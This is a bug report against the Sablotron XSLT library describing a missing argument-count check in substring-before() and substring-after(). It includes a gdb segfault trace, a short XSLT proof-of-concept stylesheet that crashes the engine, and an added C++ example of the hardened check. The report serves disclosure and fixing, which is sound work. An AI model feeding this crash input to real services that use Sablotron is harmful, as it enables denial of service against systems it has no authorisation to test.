Package: sablotron
Version: 1.0.3-1
Severity: Critical

Sablotron evaluates the arguments of an XPath function call without first
checking that all of them were actually supplied. A call with too few
arguments therefore makes the engine read an argument object that was never
created (unmapped memory) and crash. If an attacker can map this area of
memory, they may be able to cause the application to act in an unintended
way.  I did not research the possibility of code execution.

In https://github.com/lindes/sablotron/blob/master/src/engine/expr.cpp,
starting on line 3094, the implementations of the substring-before() and
substring-after() functions do not check how many arguments were passed
before they evaluate the second one.

Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7b79316 in Expression::tostring(Situation&, Str&) ()
   from /home/daybreak/sablorelease/src/engine/.libs/libsablot.so.0

PoC is attached.
<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">

<xsl:template match="/">
    <xsl:call-template name="urlResolver">
        <xsl:with-param name="input" select="hello" />
    </xsl:call-template>
</xsl:template>

<xsl:template name="urlResolver">
    <xsl:param name="input" />
    <xsl:variable name="testVar" select="substring-before('CRASH')"/>
</xsl:template>

</xsl:stylesheet>
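For comparison, the check that the code above lacks, in hardened form. This is an added example written for this report, not Sablotron's code: a hypothetical miniature of an XPath function evaluator in which substring-before() and substring-after() verify that exactly two argument expressions were supplied before evaluating either of them, so the one-argument call in the PoC is reported as an XPath error instead of dereferencing a missing argument. The Expr, Result, Status and call() names are constructed for the example and do not exist in Sablotron.

```cpp
#include <cstddef>
#include <iostream>
#include <string>
#include <vector>

// Constructed stand-in for a parsed XPath argument expression. In a real
// engine (Sablotron's Expression class, for instance) evaluating it yields a
// string; here the "expression" is just a literal.
struct Expr {
    std::string literal;
    std::string tostring() const { return literal; }
};

// Outcome of evaluating an XPath function call: either a string value or an
// XPath error for a call with the wrong number of arguments.
enum class Status { Ok, WrongArity };

struct Result {
    Status status;
    std::string value;   // meaningful only when status == Status::Ok
};

// Hardened substring-before()/substring-after(). The arity check runs before
// any argument is evaluated, so a one-argument call such as
// substring-before('CRASH') is rejected instead of reading an argument slot
// that was never filled in. The null checks also cover a parser that records
// a missing argument as a null pointer rather than omitting it.
static Result substring_fn(const std::vector<const Expr*>& args, bool before) {
    if (args.size() != 2 || args[0] == nullptr || args[1] == nullptr) {
        return {Status::WrongArity, ""};
    }
    const std::string s   = args[0]->tostring();
    const std::string pat = args[1]->tostring();
    const std::size_t pos = s.find(pat);
    if (pos == std::string::npos) {
        return {Status::Ok, ""};   // XPath 1.0: no occurrence -> empty string
    }
    // An empty pattern is found at position 0: substring-before yields "",
    // substring-after yields the whole string, as XPath 1.0 specifies.
    return {Status::Ok, before ? s.substr(0, pos) : s.substr(pos + pat.size())};
}

Result substring_before(const std::vector<const Expr*>& args) { return substring_fn(args, true); }
Result substring_after(const std::vector<const Expr*>& args)  { return substring_fn(args, false); }

// Builds the argument list from literals the way the expression parser would
// and dispatches to the chosen function (hypothetical helper for this example).
Result call(const std::vector<std::string>& literals, bool before) {
    std::vector<Expr> exprs;
    for (const std::string& l : literals) exprs.push_back(Expr{l});
    std::vector<const Expr*> args;
    for (const Expr& e : exprs) args.push_back(&e);   // exprs is fully built; pointers stay valid
    return before ? substring_before(args) : substring_after(args);
}

int main() {
    // The PoC's call shape: a single argument to substring-before().
    Result r = call({"CRASH"}, true);
    std::cout << (r.status == Status::WrongArity ? "rejected: wrong number of arguments"
                                                 : "value: " + r.value)
              << '\n';
    // A well-formed two-argument call for comparison.
    std::cout << "substring-before('1999/04/01', '/') = \""
              << call({"1999/04/01", "/"}, true).value << "\"\n";
    return 0;
}
```

The point of the ordering is that the arity test touches nothing but the argument count, so a malformed stylesheet produces a diagnosable XPath error rather than a read through a pointer the parser never set up.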
